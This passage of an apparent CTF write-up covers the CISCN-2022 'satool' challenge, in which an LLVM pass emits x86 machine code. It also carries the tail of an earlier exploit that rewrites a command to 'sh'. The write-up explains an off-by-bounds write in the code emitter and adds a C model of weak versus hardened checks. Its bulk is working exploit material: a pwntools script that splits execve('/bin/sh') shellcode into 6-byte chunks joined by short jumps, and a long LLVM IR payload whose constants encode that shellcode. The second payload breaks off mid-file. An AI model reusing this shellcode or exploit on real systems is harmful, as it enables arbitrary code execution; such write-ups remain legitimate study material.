    trunk062(0);
    trunk063(0);
    trunk064(0);
    trunk065(0);
    trunk066(0);
    trunk067(0);
    trunk068(0);
    trunk069(0);
    trunk070(0);
    trunk071(0);
    trunk072(0);
    trunk073(0);
    trunk074(0);
    trunk075(0);
    trunk076(0);
    trunk077(0);
    trunk078(0);
    trunk079(0);
    trunk080(0);
    trunk081(0);
    trunk082(0);
    trunk083(0);
    trunk084(0);
    trunk085(0);
    trunk086(0);
    trunk087(0);
    trunk088(0);
    trunk089(0);
    trunk090(0);
    trunk091(0);
    trunk092(0);
    trunk093(0);
    trunk094(0);
    trunk095(0);
    trunk096(0);
    trunk097(0);
    trunk098(0);
    trunk099(0);
    trunk100(0);
    trunk101(0);
    trunk102(0);
    trunk103(0);
    trunk104(0);
    trunk105(0);
    trunk106(0);
    trunk107(0);
    trunk108(0);
    trunk109(0);
    trunk110(0);
    trunk111(0);
    trunk112(0);
    trunk113(0);
    trunk114(0);
    trunk115(0);
    trunk116(0);
    trunk117(0);
    trunk118(0);
    trunk119(0);
    trunk120(0);
    trunk121(0);
    trunk122(0);
    trunk123(0);
    trunk124(0);
    trunk125(0);
    trunk126(0);
    trunk127(0);
    trunk128(0);
    trunk129(0);
    trunk130(0);
    trunk131(0);
    trunk132(0);
    trunk133(0);
    trunk134(0);
    trunk135(0);
    trunk136(0);
    trunk137(0);
    trunk138(0);
    trunk139(0);
    trunk140(0);
    trunk141(0);
    trunk142(0);
    trunk143(0);
    trunk144(0);
    trunk145(0);
    trunk146(0);
    trunk147(0);
    trunk148(0);
    trunk149(0);
    trunk150(0);
    trunk151(0);
    trunk152(0);
    trunk153(0);
    trunk154(0);
    trunk155(0);
    trunk156(0);
    trunk157(0);
    trunk158(0);
    trunk159(0);
    trunk160(0);
    trunk161(0);
    trunk162(0);
    trunk163(0);
    trunk164(0);
    trunk165(0);
    trunk166(0);
    trunk167(0);
    trunk168(0);
    trunk169(0);
    trunk170(0);
    trunk171(0);
    trunk172(0);
    trunk173(0);
    trunk174(0);
    trunk175(0);
    trunk176(0);
    trunk177(0);
    trunk178(0);
    trunk179(0);
    trunk180(0);
    trunk181(0);
    trunk182(0);
    trunk183(0);
    trunk184(0);
    trunk185(0);
    trunk186(0);
    trunk187(0);
    trunk188(0);
    trunk189(0);
    trunk190(0);
    trunk191(0);
    trunk192(0);
    trunk193(0);
    trunk194(0);
    trunk195(0);
    trunk196(0);
    trunk197(0);
    trunk198(0);
    trunk199(0);
    trunk200(0);
    trunk201(0);
    trunk202(0);
    trunk203(0);
    trunk204(0);
    trunk205(0);
    trunk206(0);
    trunk207(0);
    trunk208(0);
    trunk209(0);
    trunk210(0);
    trunk211(0);
    trunk212(0);
    trunk213(0);
    trunk214(0);
    trunk215(0);
    trunk216(0);
    trunk217(0);
    trunk218(0);
    trunk219(0);
    trunk220(0);
    trunk221(0);
    trunk222(0);
    trunk223(0);
    trunk224(0);
    trunk225(0);
    trunk226(0);
    trunk227(0);
    trunk228(0);
    trunk229(0);
    trunk230(0);
    trunk231(0);
    // modify cmd: 0x6EFDAD -> sh

    trunk232(0xad);
    trunk233(0xfd);
    trunk234(0x6e);
    trunk235(0);
    
    trunk236(0);
    trunk237(0);
    trunk238(0);
    trunk239(0);
    trunk240(0);
    // modify score
    trunk241(0);
    trunk242(0x40);
    trunk243(0);
    trunk244(0);
    
    trunk245(0);
    trunk246(0);
    trunk247(0);
    trunk248(0);
    trunk249(0);
    trunk250(0);
    trunk251(0);
    trunk252(0);
    trunk253(0);
    trunk254(0);
    trunk255(0);
    
    
    trunk241(0);
    trunk242(0);
    trunk243(0);
    trunk244(0);
    upgrade(0xFF);
    fight(0);
    
}

CISCN-2022 satool

This one really is hard. The vulnerability itself is not hard to understand; the hard part is how to write in the shellcode. For now I can only follow other people's write-ups to write the script; even knowing the idea it would be hard to do from scratch, so I will first record the idea and the vulnerability.

Program analysis

The analysis focuses on handle; it looks like the intended exploitation is shellcode.

readme

## Introduction

A LLVM Pass that can optimize add/sub instructions.

## How to run

opt-12 -load ./mbaPass.so -mba {*.bc/*.ll} -S

## Example

### IR before optimization

```
define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {
  %2 = sub nsw i64 %0, 2
  %3 = add nsw i64 %2, 68
  %4 = add nsw i64 %0, 6
  %5 = add nsw i64 %4, -204
  %6 = add nsw i64 %5, %3
  ret i64 %6
}
```

### IR after optimization

```
define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {
  %2 = mul i64 %0, 2
  %3 = add i64 %2, -132
  ret i64 %3
}
```

handle function

This function processes the instructions in reverse order, which can be seen from the code and can also be verified by writing a small test input (based on the readme).

```
; ModuleID = 'poc.c'
source_filename = "poc.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @main(i64 %0) #0 {
  %2 = add nsw i64 %0, 286331153
  %3 = add nsw i64 %2, 572662306
  ret i64 %3
}

attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.0-4ubuntu1 "}
```


The core of it is an if / else if / else structure.

The first if checks whether the instruction's first operand is a constant.

The else if checks whether the instruction's first operand is a function argument.

If it is neither, execution enters the else.


Entering either the if or the else if appends `movabs rax, <operand>` followed by `ret` to this, where the operand occupies 6 of the bytes.

else

It first writes a `movabs rax, 0` instruction, puts the operand xxx of `i64 %xxx` (i.e. a variable) into v26, and then enters a while loop.


The while loop

There are two exit conditions: either the amount of data written exceeds 0xff0, or v26 is empty (i.e. each basic block is executed once). On exit a ret is written.


Next it pops two entries off the stack, uses the entry from v26 to locate the corresponding instruction, checks that instruction's opcode, then fetches the instruction's two operands and enters another if / else if / else check.

1. The if check

Checks whether the instruction's first operand is ±1. If v18 * v22 is 1 it writes the instruction `inc rax`, otherwise `inc rbx`.

If the first operand is not ±1, it writes the instruction `movabs rbx, v18 * v22`.

2. The else if checks whether the operand is a function argument.

3. If it is neither a constant nor an argument, it is pushed onto the stack.

4. After that the second operand is handled: first it checks whether the instruction is an add or a sub, and the rest of the handling is essentially the same as above.


Debugging

It turns out there are basically only two places where our input ends up.

The first: on entering the else, `movabs rax, 0x0` is written (only once, right on entry).

On exit, a ret is written.


The second is when the second operand is checked.


The effect of the writes


The vulnerability

It only checks against 0xff0 bytes of data, while we can supply 0x1000. During initialization the this[4] region is filled with ret, which is only one byte, so even if every byte overflows the sequence still ends in a ret; but we can supply input a second time.

movabs rax, val

The shellcode is written into the val of `movabs rax, val`; that is the part we control, 8 bytes in size.

The first input necessarily ends with a ret, but we can write a jmp.


If the second input is shorter than the first, that jmp gets executed; what follows is a series of jumps that adjust the position until the shellcode runs.
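To make the two weaknesses described above concrete from the defender's side, here is a small C model of such a code emitter. It is added for this writeup and is not code from the challenge or its pass: `weak_emit` compares against the 0xff0 limit before an iteration without accounting for the bytes that iteration is about to append, `safe_emit` sizes the check by the instruction being written and keeps room for the trailing ret, and `jit_reset` clears the page before every compile so a shorter second compile cannot leave the first compile's bytes reachable. The buffer layout, the function names, and the sample encodings are assumptions of the model, not taken from the binary.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CODE_SIZE  0x1000   /* the RWX code page the pass emits into (per the writeup) */
#define WEAK_LIMIT 0xff0    /* the threshold the writeup says the loop checks against */

/* Assumed layout of the emitter state; the real object layout is not modelled. */
struct jit_buf {
    uint8_t code[CODE_SIZE];
    size_t  len;            /* bytes emitted so far */
};

typedef bool (*emit_fn)(struct jit_buf *, const uint8_t *, size_t);

/* Sample encodings, constructed for this demo: movabs rax, 0 and ret. */
static const uint8_t MOVABS_RAX_0[10] = { 0x48, 0xB8, 0, 0, 0, 0, 0, 0, 0, 0 };
static const uint8_t RET_INS[1]       = { 0xC3 };

/* Weak emitter, modelled on the writeup's description: the limit is compared
 * before the iteration without regard to how many bytes the iteration will
 * append, so the final write may reach anywhere up to WEAK_LIMIT + n. */
bool weak_emit(struct jit_buf *b, const uint8_t *ins, size_t n)
{
    if (b->len > WEAK_LIMIT)
        return false;
    memcpy(b->code + b->len, ins, n);
    b->len += n;
    return true;
}

/* Hardened emitter: the check is sized by the instruction being written and
 * keeps one byte in reserve so the trailing ret always fits inside the page. */
bool safe_emit(struct jit_buf *b, const uint8_t *ins, size_t n)
{
    if (b->len >= CODE_SIZE - 1 || n > CODE_SIZE - 1 - b->len)
        return false;
    memcpy(b->code + b->len, ins, n);
    b->len += n;
    return true;
}

/* Reset before every compile. Filling with int3 (0xCC) rather than ret means
 * a control transfer into unused or stale bytes traps instead of returning. */
void jit_reset(struct jit_buf *b)
{
    memset(b->code, 0xCC, CODE_SIZE);
    b->len = 0;
}

/* Emit movabs until the emitter refuses; returns how far the writes reached. */
size_t fill_until_refused(struct jit_buf *b, emit_fn emit)
{
    jit_reset(b);
    while (emit(b, MOVABS_RAX_0, sizeof MOVABS_RAX_0))
        ;
    return b->len;
}

/* Convenience wrapper with its own buffer, so callers need no state. */
size_t emitted_length(emit_fn emit)
{
    static struct jit_buf b;
    return fill_until_refused(&b, emit);
}

/* Models the second, shorter compile the writeup describes. Returns true when
 * bytes of the first compile are still present beyond the second one's end. */
bool stale_bytes_remain(bool reset_between_compiles)
{
    static struct jit_buf b;
    fill_until_refused(&b, weak_emit);                  /* first (long) compile */
    if (reset_between_compiles)
        jit_reset(&b);
    else
        b.len = 0;                                      /* rewind only, no clearing */
    weak_emit(&b, MOVABS_RAX_0, sizeof MOVABS_RAX_0);   /* second (short) compile */
    weak_emit(&b, RET_INS, sizeof RET_INS);
    /* offset 2000 is a multiple of 10, so the first compile put a movabs there */
    return b.code[2000] == 0x48;                        /* REX.W prefix still present? */
}
```

With 10-byte movabs units the weak check lets the writes reach 0xffa before it refuses, past the 0xff0 it nominally enforces, while the sized check never passes 0xfff. The second function shows why the per-compile reset matters independently of the bounds check: rewinding `len` alone leaves every byte of the longer first compile in place after the short second one.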


Where the shellcode is written


Generating the shellcode

```python
from pwn import *
context(os = 'linux', arch = 'amd64')

shellcode = [
    "mov edi, 0x68732f6e",
    "shl rdi, 24",
    "mov ebx, 0x69622f",
    "add rdi, rbx",
    "push rdi",
    "push rsp",
    "pop rdi",
    "xor rsi, rsi",
    "xor rdx, rdx",
    "push 59",
    "pop rax",
    "syscall"
]

for sc in shellcode:
    # pad each instruction to 6 bytes with nop, then append a short jmp
    print(u64(asm(sc).ljust(6, b'\x90') + b'\xEB\xEB'))

print(u16(b'\xEB\xE4'))  # the jump instruction for the part beyond 0xff0 bytes
```

exp

; ModuleID = 'exp.c'
source_filename = "exp.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"
 
; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @payload1(i64 %0) #0 {
  %2 = add nsw i64 %0, 58603
  %3 = add nsw i64 %2, 1024
  %4 = add nsw i64 %3, 1024
  %5 = add nsw i64 %4, 1024
  %6 = add nsw i64 %5, 1024
  %7 = add nsw i64 %6, 1024
  %8 = add nsw i64 %7, 1024
  %9 = add nsw i64 %8, 1024
  %10 = add nsw i64 %9, 1024
  %11 = add nsw i64 %10, 1024
  %12 = add nsw i64 %11, 1024
  %13 = add nsw i64 %12, 1024
  %14 = add nsw i64 %13, 1024
  %15 = add nsw i64 %14, 1024
  %16 = add nsw i64 %15, 1024
  %17 = add nsw i64 %16, 1024
  %18 = add nsw i64 %17, 1024
  %19 = add nsw i64 %18, 1024
  %20 = add nsw i64 %19, 1024
  %21 = add nsw i64 %20, 1024
  %22 = add nsw i64 %21, 1024
  %23 = add nsw i64 %22, 1024
  %24 = add nsw i64 %23, 1024
  %25 = add nsw i64 %24, 1024
  %26 = add nsw i64 %25, 1024
  %27 = add nsw i64 %26, 1024
  %28 = add nsw i64 %27, 1024
  %29 = add nsw i64 %28, 1024
  %30 = add nsw i64 %29, 1024
  %31 = add nsw i64 %30, 1024
  %32 = add nsw i64 %31, 1024
  %33 = add nsw i64 %32, 1024
  %34 = add nsw i64 %33, 1024
  %35 = add nsw i64 %34, 1024
  %36 = add nsw i64 %35, 1024
  %37 = add nsw i64 %36, 1024
  %38 = add nsw i64 %37, 1024
  %39 = add nsw i64 %38, 1024
  %40 = add nsw i64 %39, 1024
  %41 = add nsw i64 %40, 1024
  %42 = add nsw i64 %41, 1024
  %43 = add nsw i64 %42, 1024
  %44 = add nsw i64 %43, 1024
  %45 = add nsw i64 %44, 1024
  %46 = add nsw i64 %45, 1024
  %47 = add nsw i64 %46, 1024
  %48 = add nsw i64 %47, 1024
  %49 = add nsw i64 %48, 1024
  %50 = add nsw i64 %49, 1024
  %51 = add nsw i64 %50, 1024
  %52 = add nsw i64 %51, 1024
  %53 = add nsw i64 %52, 1024
  %54 = add nsw i64 %53, 1024
  %55 = add nsw i64 %54, 1024
  %56 = add nsw i64 %55, 1024
  %57 = add nsw i64 %56, 1024
  %58 = add nsw i64 %57, 1024
  %59 = add nsw i64 %58, 1024
  %60 = add nsw i64 %59, 1024
  %61 = add nsw i64 %60, 1024
  %62 = add nsw i64 %61, 1024
  %63 = add nsw i64 %62, 1024
  %64 = add nsw i64 %63, 1024
  %65 = add nsw i64 %64, 1024
  %66 = add nsw i64 %65, 1024
  %67 = add nsw i64 %66, 1024
  %68 = add nsw i64 %67, 1024
  %69 = add nsw i64 %68, 1024
  %70 = add nsw i64 %69, 1024
  %71 = add nsw i64 %70, 1024
  %72 = add nsw i64 %71, 1024
  %73 = add nsw i64 %72, 1024
  %74 = add nsw i64 %73, 1024
  %75 = add nsw i64 %74, 1024
  %76 = add nsw i64 %75, 1024
  %77 = add nsw i64 %76, 1024
  %78 = add nsw i64 %77, 1024
  %79 = add nsw i64 %78, 1024
  %80 = add nsw i64 %79, 1024
  %81 = add nsw i64 %80, 1024
  %82 = add nsw i64 %81, 1024
  %83 = add nsw i64 %82, 1024
  %84 = add nsw i64 %83, 1024
  %85 = add nsw i64 %84, 1024
  %86 = add nsw i64 %85, 1024
  %87 = add nsw i64 %86, 1024
  %88 = add nsw i64 %87, 1024
  %89 = add nsw i64 %88, 1024
  %90 = add nsw i64 %89, 1024
  %91 = add nsw i64 %90, 1024
  %92 = add nsw i64 %91, 1024
  %93 = add nsw i64 %92, 1024
  %94 = add nsw i64 %93, 1024
  %95 = add nsw i64 %94, 1024
  %96 = add nsw i64 %95, 1024
  %97 = add nsw i64 %96, 1024
  %98 = add nsw i64 %97, 1024
  %99 = add nsw i64 %98, 1024
  %100 = add nsw i64 %99, 1024
  %101 = add nsw i64 %100, 1024
  %102 = add nsw i64 %101, 1024
  %103 = add nsw i64 %102, 1024
  %104 = add nsw i64 %103, 1024
  %105 = add nsw i64 %104, 1024
  %106 = add nsw i64 %105, 1024
  %107 = add nsw i64 %106, 1024
  %108 = add nsw i64 %107, 1024
  %109 = add nsw i64 %108, 1024
  %110 = add nsw i64 %109, 1024
  %111 = add nsw i64 %110, 1024
  %112 = add nsw i64 %111, 1024
  %113 = add nsw i64 %112, 1024
  %114 = add nsw i64 %113, 1024
  %115 = add nsw i64 %114, 1024
  %116 = add nsw i64 %115, 1024
  %117 = add nsw i64 %116, 1024
  %118 = add nsw i64 %117, 1024
  %119 = add nsw i64 %118, 1024
  %120 = add nsw i64 %119, 1024
  %121 = add nsw i64 %120, 1024
  %122 = add nsw i64 %121, 1024
  %123 = add nsw i64 %122, 1024
  %124 = add nsw i64 %123, 1024
  %125 = add nsw i64 %124, 1024
  %126 = add nsw i64 %125, 1024
  %127 = add nsw i64 %126, 1024
  %128 = add nsw i64 %127, 1024
  %129 = add nsw i64 %128, 1024
  %130 = add nsw i64 %129, 1024
  %131 = add nsw i64 %130, 1024
  %132 = add nsw i64 %131, 1024
  %133 = add nsw i64 %132, 1024
  %134 = add nsw i64 %133, 1024
  %135 = add nsw i64 %134, 1024
  %136 = add nsw i64 %135, 1024
  %137 = add nsw i64 %136, 1024
  %138 = add nsw i64 %137, 1024
  %139 = add nsw i64 %138, 1024
  %140 = add nsw i64 %139, 1024
  %141 = add nsw i64 %140, 1024
  %142 = add nsw i64 %141, 1024
  %143 = add nsw i64 %142, 1024
  %144 = add nsw i64 %143, 1024
  %145 = add nsw i64 %144, 1024
  %146 = add nsw i64 %145, 1024
  %147 = add nsw i64 %146, 1024
  %148 = add nsw i64 %147, 1024
  %149 = add nsw i64 %148, 1024
  %150 = add nsw i64 %149, 1024
  %151 = add nsw i64 %150, 1024
  %152 = add nsw i64 %151, 1024
  %153 = add nsw i64 %152, 1024
  %154 = add nsw i64 %153, 1024
  %155 = add nsw i64 %154, 1024
  %156 = add nsw i64 %155, 1024
  %157 = add nsw i64 %156, 1024
  %158 = add nsw i64 %157, 1024
  %159 = add nsw i64 %158, 1024
  %160 = add nsw i64 %159, 1024
  %161 = add nsw i64 %160, 1024
  %162 = add nsw i64 %161, 1024
  %163 = add nsw i64 %162, 1024
  %164 = add nsw i64 %163, 1024
  %165 = add nsw i64 %164, 1024
  %166 = add nsw i64 %165, 1024
  %167 = add nsw i64 %166, 1024
  %168 = add nsw i64 %167, 1024
  %169 = add nsw i64 %168, 1024
  %170 = add nsw i64 %169, 1024
  %171 = add nsw i64 %170, 1024
  %172 = add nsw i64 %171, 1024
  %173 = add nsw i64 %172, 1024
  %174 = add nsw i64 %173, 1024
  %175 = add nsw i64 %174, 1024
  %176 = add nsw i64 %175, 1024
  %177 = add nsw i64 %176, 1024
  %178 = add nsw i64 %177, 1024
  %179 = add nsw i64 %178, 1024
  %180 = add nsw i64 %179, 1024
  %181 = add nsw i64 %180, 1024
  %182 = add nsw i64 %181, 1024
  %183 = add nsw i64 %182, 1024
  %184 = add nsw i64 %183, 1024
  %185 = add nsw i64 %184, 1024
  %186 = add nsw i64 %185, 1024
  %187 = add nsw i64 %186, 1024
  %188 = add nsw i64 %187, 1024
  %189 = add nsw i64 %188, 1024
  %190 = add nsw i64 %189, 1024
  %191 = add nsw i64 %190, 1024
  %192 = add nsw i64 %191, 1024
  %193 = add nsw i64 %192, 1024
  %194 = add nsw i64 %193, 1024
  %195 = add nsw i64 %194, 1024
  %196 = add nsw i64 %195, 1024
  %197 = add nsw i64 %196, 1024
  %198 = add nsw i64 %197, 1024
  %199 = add nsw i64 %198, 1024
  %200 = add nsw i64 %199, 1024
  %201 = add nsw i64 %200, 1024
  %202 = add nsw i64 %201, 1024
  %203 = add nsw i64 %202, 1024
  %204 = add nsw i64 %203, 1024
  %205 = add nsw i64 %204, 1024
  %206 = add nsw i64 %205, 1024
  %207 = add nsw i64 %206, 1024
  %208 = add nsw i64 %207, 1024
  %209 = add nsw i64 %208, 1024
  %210 = add nsw i64 %209, 1024
  %211 = add nsw i64 %210, 1024
  %212 = add nsw i64 %211, 1024
  %213 = add nsw i64 %212, 1024
  %214 = add nsw i64 %213, 1024
  %215 = add nsw i64 %214, 1024
  %216 = add nsw i64 %215, 1024
  %217 = add nsw i64 %216, 1024
  %218 = add nsw i64 %217, 1024
  %219 = add nsw i64 %218, 1024
  %220 = add nsw i64 %219, 1024
  %221 = add nsw i64 %220, 1024
  %222 = add nsw i64 %221, 1024
  %223 = add nsw i64 %222, 1024
  %224 = add nsw i64 %223, 1024
  %225 = add nsw i64 %224, 1024
  %226 = add nsw i64 %225, 1024
  %227 = add nsw i64 %226, 1024
  %228 = add nsw i64 %227, 1024
  %229 = add nsw i64 %228, 1024
  %230 = add nsw i64 %229, 1024
  %231 = add nsw i64 %230, 1024
  %232 = add nsw i64 %231, 1024
  %233 = add nsw i64 %232, 1024
  %234 = add nsw i64 %233, 1024
  %235 = add nsw i64 %234, 1024
  %236 = add nsw i64 %235, 1024
  %237 = add nsw i64 %236, 1024
  %238 = add nsw i64 %237, 1024
  %239 = add nsw i64 %238, 1024
  %240 = add nsw i64 %239, 1024
  %241 = add nsw i64 %240, 1024
  %242 = add nsw i64 %241, 1024
  %243 = add nsw i64 %242, 1024
  %244 = add nsw i64 %243, 1024
  %245 = add nsw i64 %244, 1024
  %246 = add nsw i64 %245, 1024
  %247 = add nsw i64 %246, 1024
  %248 = add nsw i64 %247, 1024
  %249 = add nsw i64 %248, 1024
  %250 = add nsw i64 %249, 1024
  %251 = add nsw i64 %250, 1024
  %252 = add nsw i64 %251, 1024
  %253 = add nsw i64 %252, 1024
  %254 = add nsw i64 %253, 1024
  %255 = add nsw i64 %254, 1024
  %256 = add nsw i64 %255, 1024
  %257 = add nsw i64 %256, 1024
  %258 = add nsw i64 %257, 1024
  %259 = add nsw i64 %258, 1024
  %260 = add nsw i64 %259, 1024
  %261 = add nsw i64 %260, 1024
  %262 = add nsw i64 %261, 1024
  %263 = add nsw i64 %262, 1024
  %264 = add nsw i64 %263, 1024
  %265 = add nsw i64 %264, 1024
  %266 = add nsw i64 %265, 1024
  %267 = add nsw i64 %266, 1024
  %268 = add nsw i64 %267, 1024
  %269 = add nsw i64 %268, 1024
  %270 = add nsw i64 %269, 1024
  %271 = add nsw i64 %270, 1024
  %272 = add nsw i64 %271, 1024
  %273 = add nsw i64 %272, 1024
  %274 = add nsw i64 %273, 1024
  %275 = add nsw i64 %274, 1024
  %276 = add nsw i64 %275, 1024
  %277 = add nsw i64 %276, 1024
  %278 = add nsw i64 %277, 1024
  %279 = add nsw i64 %278, 1024
  %280 = add nsw i64 %279, 1024
  %281 = add nsw i64 %280, 1024
  %282 = add nsw i64 %281, 1024
  %283 = add nsw i64 %282, 1024
  %284 = add nsw i64 %283, 1024
  %285 = add nsw i64 %284, 1024
  %286 = add nsw i64 %285, 1024
  %287 = add nsw i64 %286, 1024
  %288 = add nsw i64 %287, 1024
  %289 = add nsw i64 %288, 1024
  %290 = add nsw i64 %289, 1024
  %291 = add nsw i64 %290, 1024
  %292 = add nsw i64 %291, 1024
  %293 = add nsw i64 %292, 1024
  %294 = add nsw i64 %293, 1024
  %295 = add nsw i64 %294, 1024
  %296 = add nsw i64 %295, 1024
  %297 = add nsw i64 %296, 1024
  %298 = add nsw i64 %297, 1024
  %299 = add nsw i64 %298, 1024
  %300 = add nsw i64 %299, 1024
  %301 = add nsw i64 %300, 1024
  %302 = add nsw i64 %301, 1024
  %303 = add nsw i64 %302, 1024
  %304 = add nsw i64 %303, 1024
  %305 = add nsw i64 %304, 1024
  %306 = add nsw i64 %305, 1024
  %307 = add nsw i64 %306, 1024
  %308 = add nsw i64 %307, 1024
  %309 = add nsw i64 %308, 1024
  %310 = add nsw i64 %309, 1024
  %311 = add nsw i64 %310, 1024
  %312 = add nsw i64 %311, 1024
  %313 = add nsw i64 %312, 1024
  %314 = add nsw i64 %313, 1024
  %315 = add nsw i64 %314, 1024
  ret i64 %315
}
 
; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @payload2(i64 %0) #0 {
  %2 = add nsw i64 %0, 1
  %3 = add nsw i64 %2, 1
  %4 = add nsw i64 %3, 1
  %5 = add nsw i64 %4, 1
  %6 = add nsw i64 %5, 1
  %7 = add nsw i64 %6, 16999839996723556031
  %8 = add nsw i64 %7, 16999840167007600968
  %9 = add nsw i64 %8, 16999839549882511291
  %10 = add nsw i64 %9, 16999840169020293448
  %11 = add nsw i64 %10, 16999840169015152727
  %12 = add nsw i64 %11, 16999840169015152724
  %13 = add nsw i64 %12, 16999840169015152735
  %14 = add nsw i64 %13, 16999840169021813064
  %15 = add nsw i64 %14, 16999840169019453768
  %16 = add nsw i64 %15, 16999840169015130986
  %17 = add nsw i64 %16, 16999840169015152728
  %18 = add nsw i64 %17, 16999840169015117071
  %19 = add nsw i64 %18, 1024
  %20 = add nsw i64 %19, 1024
  %21 = add nsw i64 %20, 1024
  %22 = add nsw i64 %21, 1024
  %23 = add nsw i64 %22, 1024
  %24 = add nsw i64 %23, 1024
  %25 = add nsw i64 %24, 1024
  %26 = add nsw i64 %25, 1024
  %27 = add nsw i64 %26, 1024
  %28 = add nsw i64 %27, 1024
  %29 = add nsw i64 %28, 1024
  %30 = add nsw i64 %29, 1024
  %31 = add nsw i64 %30, 1024
  %32 = add nsw i64 %31, 1024
  %33 = add nsw i64 %32, 1024
  %34 = add nsw i64 %33, 1024
  %35 = add nsw i64 %34, 1024
  %36 = add nsw i64 %35, 1024
  %37 = add nsw i64 %36, 1024
  %38 = add nsw i64 %37, 1024
  %39 = add nsw i64 %38, 1024
  %40 = add nsw i64 %39, 1024
  %41 = add nsw i64 %40, 1024
  %42 = add nsw i64 %41, 1024
  %43 = add nsw i64 %42, 1024
  %44 = add nsw i64 %43, 1024
  %45 = add nsw i64 %44, 1024
  %46 = add nsw i64 %45, 1024
  %47 = add nsw i64 %46, 1024
  %48 = add nsw i64 %47, 1024
  %49 = add nsw i64 %48, 1024
  %50 = add nsw i64 %49, 1024
  %51 = add nsw i64 %50, 1024
  %52 = add nsw i64 %51, 1024
  %53 = add nsw i64 %52, 1024
  %54 = add nsw i64 %53, 1024
  %55 = add nsw i64 %54, 1024
  %56 = add nsw i64 %55, 1024
  %57 = add nsw i64 %56, 1024
  %58 = add nsw i64 %57, 1024
  %59 = add nsw i64 %58, 1024
  %60 = add nsw i64 %59, 1024
  %61 = add nsw i64 %60, 1024
  %62 = add nsw i64 %61, 1024
  %63 = add nsw i64 %62, 1024
  %64 = add nsw i64 %63, 1024
  %65 = add nsw i64 %64, 1024
  %66 = add nsw i64 %65, 1024
  %67 = add nsw i64 %66, 1024
  %68 = add nsw i64 %67, 1024
  %69 = add nsw i64 %68, 1024
  %70 = add nsw i64 %69, 1024
  %71 = add nsw i64 %70, 1024
  %72 = add nsw i64 %71, 1024
  %73 = add nsw i64 %72, 1024
  %74 = add nsw i64 %73, 1024
  %75 = add nsw i64 %74, 1024
  %76 = add nsw i64 %75, 1024
  %77 = add nsw i64 %76, 1024
  %78 = add nsw i64 %77, 1024
  %79 = add nsw i64 %78, 1024
  %80 = add nsw i64 %79, 1024
  %81 = add nsw i64 %80, 1024
  %82 = add nsw i64 %81, 1024
  %83 = add nsw i64 %82, 1024
  %84 = add nsw i64 %83, 1024
  %85 = add nsw i64 %84, 1024
  %86 = add nsw i64 %85, 1024
  %87 = add nsw i64 %86, 1024
  %88 = add nsw i64 %87, 1024
  %89 = add nsw i64 %88, 1024
  %90 = add nsw i64 %89, 1024
  %91 = add nsw i64 %90, 1024
  %92 = add nsw i64 %91, 1024
  %93 = add nsw i64 %92, 1024
  %94 = add nsw i64 %93, 1024
  %95 = add nsw i64 %94, 1024
  %96 = add nsw i64 %95, 1024
  %97 = add nsw i64 %96, 1024
  %98 = add nsw i64 %97, 1024
  %99 = add nsw i64 %98, 1024
  %100 = add nsw i64 %99, 1024
  %101 = add nsw i64 %100, 1024
  %102 = add nsw i64 %101, 1024
  %103 = add nsw i64 %102, 1024
  %104 = add nsw i64 %103, 1024
  %105 = add nsw i64 %104, 1024
  %106 = add nsw i64 %105, 1024
  %107 = add nsw i64 %106, 1024
  %108 = add nsw i64 %107, 1024
  %109 = add nsw i64 %108, 1024
  %110 = add nsw i64 %109, 1024
  %111 = add nsw i64 %110, 1024
  %112 = add nsw i64 %111, 1024
  %113 = add nsw i64 %112, 1024
  %114 = add nsw i64 %113, 1024
  %115 = add nsw i64 %114, 1024
  %116 = add nsw i64 %115, 1024
  %117 = add nsw i64 %116, 1024
  %118 = add nsw i64 %117, 1024
  %119 = add nsw i64 %118, 1024
  %120 = add nsw i64 %119, 1024
  %121 = add nsw i64 %120, 1024
  %122 = add nsw i64 %121, 1024
  %123 = add nsw i64 %122, 1024
  %124 = add nsw i64 %123, 1024
  %125 = add nsw i64 %124, 1024
  %126 = add nsw i64 %125, 1024
  %127 = add nsw i64 %126, 1024
  %128 = add nsw i64 %127, 1024
  %129 = add nsw i64 %128, 1024
  %130 = add nsw i64 %129, 1024
  %131 = add nsw i64 %130, 1024
  %132 = add nsw i64 %131, 1024
  %133 = add nsw i64 %132, 1024
  %134 = add nsw i64 %133, 1024
  %135 = add nsw i64 %134, 1024
  %136 = add nsw i64 %135, 1024
  %137 = add nsw i64 %136, 1024
  %138 = add nsw i64 %137, 1024
  %139 = add nsw i64 %138, 1024
  %140 = add nsw i64 %139, 1024
  %141 = add nsw i64 %140, 1024
  %142 = add nsw i64 %141, 1024
  %143 = add nsw i64 %142, 1024
  %144 = add nsw i64 %143, 1024
  %145 = add nsw i64 %144, 1024
  %146 = add nsw i64 %145, 1024
  %147 = add nsw i64 %146, 1024
  %148 = add nsw i64 %147, 1024
  %149 = add nsw i64 %148, 1024
  %150 = add nsw i64 %149, 1024
  %151 = add nsw i64 %150, 1024
  %152 = add nsw i64 %151, 1024
  %153 = add nsw i64 %152, 1024
  %154 = add nsw i64 %153, 1024
  %155 = add nsw i64 %154, 1024
  %156 = add nsw i64 %155, 1024
  %157 = add nsw i64 %156, 1024
  %158 = add nsw i64 %157, 1024
  %159 = add nsw i64 %158, 1024
  %160 = add nsw i64 %159, 1024
  %161 = add nsw i64 %160, 1024
  %162 = add nsw i64 %161, 1024
  %163 = add nsw i64 %162, 1024
  %164 = add nsw i64 %163, 1024
  %165 = add nsw i64 %164, 1024
